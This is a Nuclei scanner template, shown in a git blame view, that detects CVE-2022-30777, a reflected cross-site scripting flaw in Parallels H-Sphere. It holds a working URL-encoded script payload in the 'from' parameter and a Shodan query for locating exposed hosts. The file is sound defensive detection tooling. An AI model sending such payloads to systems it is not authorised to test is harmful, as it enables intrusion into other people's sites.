nuclei-templates/http/cves/2022/CVE-2022-30777.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-17 11:43:11 +00:00
id: CVE-2022-30777
info:
name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting
2022-05-17 11:43:11 +00:00
author: 3th1c_yuk1
severity: medium
description: |
Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.
2022-05-17 11:43:11 +00:00
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
- https://en.wikipedia.org/wiki/H-Sphere
- https://nvd.nist.gov/vuln/detail/CVE-2022-30777
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-30777
cwe-id: CWE-79
cpe: cpe:2.3:a:parallels:h-sphere:*:*:*:*:*:*:*:*
epss-score: 0.0007
2022-06-30 12:38:21 +00:00
metadata:
max-request: 2
2022-06-30 12:38:21 +00:00
shodan-query: title:"h-sphere"
2023-06-04 08:13:42 +00:00
verified: true
2022-06-30 12:38:21 +00:00
tags: cve,cve2022,parallels,hsphere,xss
2022-05-17 11:43:11 +00:00
http:
2022-05-17 11:43:11 +00:00
- method: GET
path:
2022-06-30 12:38:21 +00:00
- '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-05-17 11:43:11 +00:00
2022-06-30 12:38:21 +00:00
stop-at-first-match: true
2022-05-17 11:43:11 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-06-30 12:38:21 +00:00
- '<TITLE>"><script>alert(document.domain)</script>'
2022-05-17 11:43:11 +00:00
- type: word
part: header
words:
- "text/html"
2022-06-30 12:38:21 +00:00
- type: status
status:
- 200